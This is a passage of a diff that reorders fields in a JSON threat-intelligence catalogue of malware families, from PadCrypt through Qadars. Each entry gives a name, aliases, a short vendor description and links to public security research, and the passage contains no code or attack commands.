"https://johannesbader.ch/2016/03/the-dga-of-padcrypt/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "c21335f5-b145-4029-b1bc-161362c7ce80", - "value": "PadCrypt", - "description": "" + "value": "PadCrypt" }, { + "description": "Paladin RAT is a variant of Gh0st RAT used by PittyPanda active since at least 2011.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.paladin", "https://bitbucket.org/cybertools/whitepapers/downloads/Pitty%20Tiger%20Final%20Report.pdf", "https://www.fireeye.com/blog/threat-research/2014/07/spy-of-the-tiger.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "c6728a76-f4d9-4c49-a3aa-be895df13a35", - "value": "paladin", - "description": "Paladin RAT is a variant of Gh0st RAT used by PittyPanda active since at least 2011." + "value": "paladin" }, { + "description": "According to Arbor, Forcepoint and Proofpoint, Panda is a variant of the well-known Zeus banking trojan(*). Fox IT discovered it in February 2016.\r\n\r\nThis banking trojan uses the infamous ATS (Automatic Transfer System/Scripts) to automate online bank portal actions.\r\n\r\nThe baseconfig (c2, crypto material, botnet name, version) is embedded in the malware itself. It then obtains a dynamic config from the c2, with further information about how to grab the webinjects and additional modules, such as vnc, backsocks and grabber.\r\n\r\nPanda does have some DGA implemented, but according to Arbor, a bug prevents it from using it.", "meta": { - "synonyms": [ - "ZeusPanda" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pandabanker", "https://github.com/JR0driguezB/malware_configs/tree/master/PandaBanker", @@ -10795,55 +10795,57 @@ "https://www.arbornetworks.com/blog/asert/let-pandas-zeus-zeus-zeus-zeus/", "http://www.vkremez.com/2018/01/lets-learn-dissect-panda-banking.html", "https://cyber.wtf/2017/03/13/zeus-panda-webinjects-dont-trust-your-eyes/" - ] + ], + "synonyms": [ + "ZeusPanda" + ], + "type": [] }, "uuid": "31ebe294-f125-4cf3-95cc-f4150ab23303", - "value": "PandaBanker", - "description": "According to Arbor, Forcepoint and Proofpoint, Panda is a variant of the well-known Zeus banking trojan(*). Fox IT discovered it in February 2016.\r\n\r\nThis banking trojan uses the infamous ATS (Automatic Transfer System/Scripts) to automate online bank portal actions.\r\n\r\nThe baseconfig (c2, crypto material, botnet name, version) is embedded in the malware itself. It then obtains a dynamic config from the c2, with further information about how to grab the webinjects and additional modules, such as vnc, backsocks and grabber.\r\n\r\nPanda does have some DGA implemented, but according to Arbor, a bug prevents it from using it." + "value": "PandaBanker" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.parasite_http", "https://www.proofpoint.com/us/threat-insight/post/parasite-http-rat-cooks-stew-stealthy-tricks" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "c5eee19f-0877-4709-86ea-328e346af1bf", - "value": "parasite_http", - "description": "" + "value": "parasite_http" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.penco" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "a2fd9b8a-826d-4df5-9a29-d61a8456d086", - "value": "Penco", - "description": "" + "value": "Penco" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.petrwrap", "https://securelist.com/blog/research/77762/petrwrap-the-new-petya-based-ransomware-used-in-targeted-attacks/", "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "82ed8fae-552e-407b-b3fc-f617b7a8f996", - "value": "PetrWrap", - "description": "" + "value": "PetrWrap" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.petya", "https://blog.malwarebytes.com/threat-analysis/2016/04/petya-ransomware/", @@ -10851,31 +10853,31 @@ "https://blog.malwarebytes.com/threat-analysis/2016/07/third-time-unlucky-improved-petya-is-out/", "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/", "https://blog.malwarebytes.com/malwarebytes-news/2017/07/bye-bye-petya-decryptor-old-versions-released/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "34c9dbaa-97ac-4e1e-9eca-b7c492d67efc", - "value": "Petya", - "description": "" + "value": "Petya" }, { + "description": "Information gathering and downloading tool used to deliver second stage malware to the infected system", "meta": { - "synonyms": [ - "ReRol" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pgift", "https://community.fireeye.com/external/1093" - ] + ], + "synonyms": [ + "ReRol" + ], + "type": [] }, "uuid": "add29684-94b7-4c75-a43b-d039c4b76158", - "value": "pgift", - "description": "Information gathering and downloading tool used to deliver second stage malware to the infected system" + "value": "pgift" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.philadelphia_ransom", "https://blogs.forcepoint.com/security-labs/shelf-ransomware-used-target-healthcare-sector", @@ -10883,135 +10885,133 @@ "https://www.proofpoint.com/us/threat-insight/post/philadelphia-ransomware-customization-commodity-malware", "https://krebsonsecurity.com/2017/03/ransomware-for-dummies-anyone-can-do-it/", "https://www.bleepingcomputer.com/news/security/the-philadelphia-ransomware-offers-a-mercy-button-for-compassionate-criminals/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "f2a10bec-4783-4cfc-8e93-acd3c12a517d", - "value": "Philadephia Ransom", - "description": "" + "value": "Philadephia Ransom" }, { + "description": "Proofpoint describes Phorpiex/Trik as a SDBot fork (thus IRC-based) that has been used to distribute GandCrab, Pushdo, Pony, and coinminers. The name Trik is derived from PDB strings.", "meta": { - "synonyms": [ - "Trik" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.phorpiex", "https://www.johannesbader.ch/2016/02/phorpiex/", "https://blog.trendmicro.com/trendlabs-security-intelligence/shylock-not-the-lone-threat-targeting-skype/", "https://www.proofpoint.com/us/threat-insight/post/phorpiex-decade-spamming-shadows", "https://www.bleepingcomputer.com/news/security/trik-spam-botnet-leaks-43-million-email-addresses/" - ] + ], + "synonyms": [ + "Trik" + ], + "type": [] }, "uuid": "9759f99b-6d6c-4633-aa70-cb1d2bacc540", - "value": "Phorpiex", - "description": "Proofpoint describes Phorpiex/Trik as a SDBot fork (thus IRC-based) that has been used to distribute GandCrab, Pushdo, Pony, and coinminers. The name Trik is derived from PDB strings." + "value": "Phorpiex" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pipcreat", "https://www.snort.org/rule_docs/1-26941" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "ea1c71fe-ad42-4c5a-8114-9ab9ecaa66f5", - "value": "pipcreat", - "description": "" + "value": "pipcreat" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pirpi", "https://researchcenter.paloaltonetworks.com/2015/07/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "e2325481-006f-4ad4-86d9-1a2ae6fea154", - "value": "pirpi", - "description": "" + "value": "pirpi" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pitou", "https://www.tgsoft.it/english/news_archivio_eng.asp?id=884", "https://www.f-secure.com/documents/996508/1030745/pitou_whitepaper.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "f371c85c-56f6-4ddf-8502-81866da4965b", - "value": "Pitou", - "description": "" + "value": "Pitou" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pittytiger_rat", "https://securingtomorrow.mcafee.com/mcafee-labs/targeted-attacks-on-french-company-exploit-multiple-word-vulnerabilities/", "https://bitbucket.org/cybertools/whitepapers/downloads/Pitty%20Tiger%20Final%20Report.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "7ac902e0-4a7d-4451-b0fd-cdf98fbe5018", - "value": "PittyTiger RAT", - "description": "" + "value": "PittyTiger RAT" }, { + "description": "Pkybot is a trojan, which has its roots as a downloader dubbed Bublik in 2013 and was seen distributing GameoverZeus in 2014 (ref: fortinet). In the beginning of 2015, webinject capability was added according to /Kleissner/Kafeine/iSight using the infamous ATS.", "meta": { - "synonyms": [ - "Pykbot", - "TBag", - "Bublik" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pkybot", "http://blog.kleissner.org/?p=788", "https://blog.fortinet.com/2014/05/29/bublik-downloader-evolution", "http://webcache.googleusercontent.com/search?q=cache:JN3yRXXuYsYJ:https://www.arbornetworks.com/blog/asert/peeking-at-pkybot" - ] + ], + "synonyms": [ + "Pykbot", + "TBag", + "Bublik" + ], + "type": [] }, "uuid": "19d71f38-422c-48f4-9f90-867eb4d4182e", - "value": "Pkybot", - "description": "Pkybot is a trojan, which has its roots as a downloader dubbed Bublik in 2013 and was seen distributing GameoverZeus in 2014 (ref: fortinet). In the beginning of 2015, webinject capability was added according to /Kleissner/Kafeine/iSight using the infamous ATS." + "value": "Pkybot" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.plaintee", "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "66087a9c-b5ac-4d6d-b79e-c0294728c876", - "value": "PLAINTEE", - "description": "" + "value": "PLAINTEE" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.playwork", "https://contagiodump.blogspot.com/2011/01/jan-6-cve-2010-3333-with-info-theft.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "5e1f467b-f81e-487c-a911-ab63ae7e9b86", - "value": "playwork", - "description": "" + "value": "playwork" }, { + "description": "", "meta": { - "synonyms": [ - "TSCookie" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.plead", "http://www.freebuf.com/column/159865.html", @@ -11020,60 +11020,60 @@ "https://documents.trendmicro.com/assets/appendix-following-the-trail-of-blacktechs-cyber-espionage-campaigns.pdf", "https://blog.jpcert.or.jp/2018/06/plead-downloader-used-by-blacktech.html", "https://www.welivesecurity.com/2018/07/09/certificates-stolen-taiwanese-tech-companies-plead-malware-campaign/" - ] + ], + "synonyms": [ + "TSCookie" + ], + "type": [] }, "uuid": "43a56ed7-8092-4b36-998c-349b02b3bd0d", - "value": "PLEAD", - "description": "" + "value": "PLEAD" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.plexor", "https://securelist.com/blog/research/77990/unraveling-the-lamberts-toolkit/", "https://www.symantec.com/connect/blogs/longhorn-tools-used-cyberespionage-group-linked-vault-7" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "5c860744-bb12-4587-a852-ee060fd4dd64", - "value": "Plexor", - "description": "" + "value": "Plexor" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ploutus_atm", "https://www.fireeye.com/blog/threat-research/2017/01/new_ploutus_variant.html", "http://antonioparata.blogspot.co.uk/2018/02/analyzing-nasty-net-protection-of.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "d91c4184-608e-47b1-b746-0e98587e2455", - "value": "Ploutus ATM", - "description": "" + "value": "Ploutus ATM" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ployx", "https://contagiodump.blogspot.com/2012/12/end-of-year-presents-continue.html", "https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Ployx-A/detailed-analysis.aspx" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "7bad2f44-93b0-406d-a619-28f14c4bd344", - "value": "ployx", - "description": "" + "value": "ployx" }, { + "description": "RSA describes PlugX as a RAT (Remote Access Trojan) malware family that is around since 2008 and is used as a backdoor to control the victim's machine fully. Once the device is infected, an attacker can remotely execute several kinds of commands on the affected system.\r\n\r\nNotable features of this malware family are the ability to execute commands on the affected machine to retrieve:\r\nmachine information\r\ncapture the screen\r\nsend keyboard and mouse events\r\nkeylogging\r\nreboot the system\r\nmanage processes (create, kill and enumerate)\r\nmanage services (create, start, stop, etc.); and\r\nmanage Windows registry entries, open a shell, etc.\r\n\r\nThe malware also logs its events in a text log file.", "meta": { - "synonyms": [ - "Korplug" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.plugx", "https://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdf", @@ -11092,32 +11092,31 @@ "https://blog.malwarebytes.com/threat-analysis/2016/08/unpacking-the-spyware-disguised-as-antivirus/", "https://securelist.com/time-of-death-connected-medicine/84315/", "https://community.rsa.com/thread/185439" - ] + ], + "synonyms": [ + "Korplug" + ], + "type": [] }, "uuid": "036bd099-fe80-46c2-9c4c-e5c6df8dcdee", - "value": "PlugX", - "description": "RSA describes PlugX as a RAT (Remote Access Trojan) malware family that is around since 2008 and is used as a backdoor to control the victim's machine fully. Once the device is infected, an attacker can remotely execute several kinds of commands on the affected system.\r\n\r\nNotable features of this malware family are the ability to execute commands on the affected machine to retrieve:\r\nmachine information\r\ncapture the screen\r\nsend keyboard and mouse events\r\nkeylogging\r\nreboot the system\r\nmanage processes (create, kill and enumerate)\r\nmanage services (create, start, stop, etc.); and\r\nmanage Windows registry entries, open a shell, etc.\r\n\r\nThe malware also logs its events in a text log file." + "value": "PlugX" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pngdowner", "https://www.iocbucket.com/iocs/7f7999ab7f223409ea9ea10cff82b064ce2a1a31" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "fb4313ea-1fb6-4766-8b5c-b41fd347e4c5", - "value": "pngdowner", - "description": "" + "value": "pngdowner" }, { + "description": "", "meta": { - "synonyms": [ - "pivy", - "poisonivy" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.poison_ivy", "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/analysing-a-recent-poison-ivy-sample/", @@ -11128,407 +11127,410 @@ "https://researchcenter.paloaltonetworks.com/2014/09/recent-watering-hole-attacks-attributed-apt-group-th3bug-using-poison-ivy/", "https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections/blob/master/2016/2016.04.26.New_Poison_Ivy_Activity_Targeting_Myanmar_Asian_Countries/New%20Poison%20Ivy%20Activity%20Targeting%20Myanmar%2C%20Asian%20Countries.pdf", "https://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/" - ] + ], + "synonyms": [ + "pivy", + "poisonivy" + ], + "type": [] }, "uuid": "7789fc1b-3cbc-4a1c-8ef0-8b06760f93e7", - "value": "Poison Ivy", - "description": "" + "value": "Poison Ivy" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.polyglot_ransom", "https://securelist.com/blog/research/76182/polyglot-the-fake-ctb-locker/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "5ee77368-5e09-4016-ae73-82b99e830832", - "value": "Polyglot", - "description": "" + "value": "Polyglot" }, { + "description": "", "meta": { - "synonyms": [ - "Siplog", - "Fareit" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pony", "https://www.mcafee.com/us/resources/reports/rp-quarterly-threats-jun-2017.pdf", "https://www.uperesia.com/analysis-of-a-packed-pony-downloader", "https://github.com/nyx0/Pony" - ] + ], + "synonyms": [ + "Siplog", + "Fareit" + ], + "type": [] }, "uuid": "cd201689-4bf1-4c5b-ac4d-21c4dcc39e7d", - "value": "Pony", - "description": "" + "value": "Pony" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.poohmilk", "https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/", "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "54327cbd-d30c-4684-9a66-18ae36b28399", - "value": "PoohMilk Loader", - "description": "" + "value": "PoohMilk Loader" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.popcorn_time", "https://twitter.com/malwrhunterteam/status/806595092177965058" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "4ceebc38-f50b-4817-930f-c954d203ff7b", - "value": "Popcorn Time", - "description": "" + "value": "Popcorn Time" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.portless", "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/20134508/winnti-more-than-just-a-game-130410.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "b813cb80-28ff-4713-abdc-e9a22d397bb4", - "value": "portless", - "description": "" + "value": "portless" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.poscardstealer", "http://pages.arbornetworks.com/rs/arbor/images/ASERT%20Threat%20Intelligence%20Brief%202014-06%20Uncovering%20PoS%20Malware%20and%20Attack%20Campaigns.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "5fa166d1-128b-4057-87e3-6676b7d9a7d7", - "value": "poscardstealer", - "description": "" + "value": "poscardstealer" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.poweliks_dropper", "https://www.zscaler.com/blogs/research/malvertising-targeting-european-transit-users" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "782bee33-9f8d-41df-a608-c014bd6a7de1", - "value": "Poweliks Dropper", - "description": "" + "value": "Poweliks Dropper" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.powerduke", "https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "c79f5876-e3b9-417a-8eaf-8f1b01a0fecd", - "value": "PowerDuke", - "description": "" + "value": "PowerDuke" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.powerpool", "https://www.welivesecurity.com/2018/09/05/powerpool-malware-exploits-zero-day-vulnerability/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "02e5196e-f7ac-490a-9a92-d4865740016b", - "value": "PowerPool", - "description": "" + "value": "PowerPool" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.powersniff", "https://lokalhost.pl/gozi_tree.txt" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "519d07f5-bea3-4360-8aa5-f9fcdb79cb52", - "value": "Powersniff", - "description": "" + "value": "Powersniff" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.power_ratankba", "https://www.riskiq.com/blog/labs/lazarus-group-cryptocurrency/", "https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-campaign-targeting-cryptocurrencies-reveals-remote-controller-tool-evolved-ratankba/", "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "606f778a-8b99-4880-8da8-b923651d627b", - "value": "PowerRatankba", - "description": "" + "value": "PowerRatankba" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.prb_backdoor", "https://sec0wn.blogspot.com/2018/05/prb-backdoor-fully-loaded-powershell.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "2c9c42bc-8f26-4122-9454-a7eed8cd8886", - "value": "prb_backdoor", - "description": "" + "value": "prb_backdoor" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.prikormka", "https://www.welivesecurity.com/wp-content/uploads/2016/05/Operation-Groundbait.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "00764634-4a21-4c5c-8b1f-fb294c9bdd3f", - "value": "Prikorma", - "description": "" + "value": "Prikorma" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.prilex", "https://blog.trendmicro.com/trendlabs-security-intelligence/dissecting-prilex-cutlet-maker-atm-malware-families/", "https://www.kaspersky.com/blog/chip-n-pin-cloning/21502" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "a0899fec-161d-4ba8-9594-8b5620c21705", - "value": "Prilex", - "description": "" + "value": "Prilex" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.princess_locker", "https://blog.malwarebytes.com/threat-analysis/2016/11/princess-ransomware/", "https://hshrzd.wordpress.com/2016/11/17/princess-locker-decryptor/", "https://www.bleepingcomputer.com/news/security/introducing-her-royal-highness-the-princess-locker-ransomware/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "0714a7ad-45cb-44ec-92f9-2e839fd8a6b8", - "value": "PrincessLocker", - "description": "" + "value": "PrincessLocker" }, { + "description": "According to Matthew Mesa, this is a modular bot. The name stems from the string PsiXMainModule in binaries until mid of September 2018.\r\n\r\nIn binaries, apart from BotModule and MainModule, references to the following Modules have be observed:\r\nBrowserModule\r\nBTCModule\r\nComplexModule\r\nKeyLoggerModule\r\nOutlookModule\r\nProcessModule\r\nRansomwareModule\r\nSkypeModule", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.psix", "https://twitter.com/mesa_matt/status/1035211747957923840" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "416ae41e-17b2-46f6-847b-2831a0b3f8e9", - "value": "PsiX", - "description": "According to Matthew Mesa, this is a modular bot. The name stems from the string PsiXMainModule in binaries until mid of September 2018.\r\n\r\nIn binaries, apart from BotModule and MainModule, references to the following Modules have be observed:\r\nBrowserModule\r\nBTCModule\r\nComplexModule\r\nKeyLoggerModule\r\nOutlookModule\r\nProcessModule\r\nRansomwareModule\r\nSkypeModule" + "value": "PsiX" }, { + "description": "Citizenlab notes that PC Surveillance System (PSS) is a commercial spyware product offered by Cyberbit and marketed to intelligence and law enforcement agencies.", "meta": { - "synonyms": [ - "PSS" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pss", "https://citizenlab.ca/2017/12/champing-cyberbit-ethiopian-dissidents-targeted-commercial-spyware/" - ] + ], + "synonyms": [ + "PSS" + ], + "type": [] }, "uuid": "e437f01c-8040-4098-a3fa-20154b58c928", - "value": "PC Surveillance System", - "description": "Citizenlab notes that PC Surveillance System (PSS) is a commercial spyware product offered by Cyberbit and marketed to intelligence and law enforcement agencies." + "value": "PC Surveillance System" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pteranodon", "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "d5138738-846e-4466-830c-cd2bb6ad09cf", - "value": "Pteranodon", - "description": "" + "value": "Pteranodon" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pubnubrat", "http://blog.alyac.co.kr/1853", "https://blog.talosintelligence.com/2018/04/fake-av-investigation-unearths-kevdroid.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "bcc8e3ef-fc5e-4d44-9011-4d429bac0f26", - "value": "PubNubRAT", - "description": "" + "value": "PubNubRAT" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.punkey_pos", "https://www.trustwave.com/Resources/SpiderLabs-Blog/New-POS-Malware-Emerges---Punkey/", "https://www.pandasecurity.com/mediacenter/malware/punkeypos/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "57a6dbce-2d8a-44ae-a561-282d02935698", - "value": "Punkey POS", - "description": "" + "value": "Punkey POS" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pupy", "https://github.com/n1nj4sec/pupy", "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", "https://blog.cyber4sight.com/2017/02/malicious-powershell-script-analysis-indicates-shamoon-actors-used-pupy-rat/", "https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "8a789016-5f8d-4cd9-ba96-ba253db42fd8", - "value": "pupy", - "description": "" + "value": "pupy" }, { + "description": "Pushdo is usually classified as a \"downloader\" trojan - meaning its true purpose is to download and install additional malicious software. There are dozens of downloader trojan families out there, but Pushdo is actually more sophisticated than most, but that sophistication lies in the Pushdo control server rather than the trojan.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pushdo", "https://www.secureworks.com/research/pushdo", "https://www.trendmicro.de/cloud-content/us/pdfs/business/white-papers/wp_study-of-pushdo-cutwail-botnet.pdf", "http://malware-traffic-analysis.net/2017/04/03/index2.html", "https://www.blueliv.com/research/tracking-the-footproints-of-pushdo-trojan/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "b39ffc73-db5f-4a8a-acd2-bee958d69155", - "value": "Pushdo", - "description": "Pushdo is usually classified as a \"downloader\" trojan - meaning its true purpose is to download and install additional malicious software. There are dozens of downloader trojan families out there, but Pushdo is actually more sophisticated than most, but that sophistication lies in the Pushdo control server rather than the trojan." + "value": "Pushdo" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.putabmow" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "b0cb81bc-5d97-454a-8eee-4e81328c7228", - "value": "Putabmow", - "description": "" + "value": "Putabmow" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pvzout", "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "52932caa-2fac-4eeb-88de-b3e143db010e", - "value": "PvzOut", - "description": "" + "value": "PvzOut" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pwnpos", "https://blog.trendmicro.com/trendlabs-security-intelligence/pwnpos-old-undetected-pos-malware-still-causing-havoc/", "https://www.brimorlabsblog.com/2015/03/and-you-get-pos-malware-nameand-you-get.html", "https://twitter.com/physicaldrive0/status/573109512145649664" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "c903627c-90f6-44ee-9750-4bb44bdbceab", - "value": "pwnpos", - "description": "" + "value": "pwnpos" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pykspa", "https://www.johannesbader.ch/2015/03/the-dga-of-pykspa/", "https://www.johannesbader.ch/2015/07/pykspas-inferior-dga-version/", "https://www.youtube.com/watch?v=HfSQlC76_s4" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "3f0e7db1-5944-4137-89d1-d36940f596d2", - "value": "Pykspa", - "description": "" + "value": "Pykspa" }, { + "description": "PyLocky is a ransomware that tries to pass off as Locky in its ransom note. It is written in Python and packaged with PyInstaller.", "meta": { - "synonyms": [ - "Locky Locker" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.pylocky", "https://sensorstechforum.com/lockymap-files-virus-pylocky-ransomware-remove-restore-data/", "https://www.cert.ssi.gouv.fr/alerte/CERTFR-2018-ALE-008/", "https://blog.trendmicro.com/trendlabs-security-intelligence/a-closer-look-at-the-locky-poser-pylocky-ransomware/" - ] + ], + "synonyms": [ + "Locky Locker" + ], + "type": [] }, "uuid": "3a5775d3-7d4a-4795-b1b1-7a340030d490", - "value": "PyLocky", - "description": "PyLocky is a ransomware that tries to pass off as Locky in its ransom note. It is written in Python and packaged with PyInstaller." + "value": "PyLocky" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.qaccel" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "f4980a75-f72c-4925-8ff5-118b32dd5eaa", - "value": "Qaccel", - "description": "" + "value": "Qaccel" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.qadars", "https://info.phishlabs.com/blog/dissecting-the-qadars-banking-trojan", @@ -11537,19 +11539,16 @@ 